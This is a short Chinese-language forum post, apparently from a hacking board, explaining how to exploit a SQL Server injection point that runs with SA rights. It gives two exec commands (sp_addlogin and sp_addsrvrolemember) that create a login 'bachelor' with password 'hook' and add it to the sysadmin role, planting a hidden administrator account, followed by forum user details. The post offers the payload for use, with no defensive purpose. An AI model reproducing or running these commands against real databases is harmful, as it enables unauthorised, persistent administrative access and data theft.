返回列表 发帖
如果是SA,可以先尝试TELNET,如果能成功,就在注入点执行:
exec master.dbo.sp_addlogin bachelor  hook;
exec master.dbo.sp_addsrvrolemember bachelor,sysadmin
这个命令就是添加一个用户名为bachelor密码为hook的SQL用户,权限为SA
然后再在SQL查询分析器中执行一些语句

帖子11 精华0 积分31 阅读权限40 来自china 在线时间5 小时 注册时间2007-11-6 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

blue_wind
晶莹剔透§烈日灼然

TOP

返回列表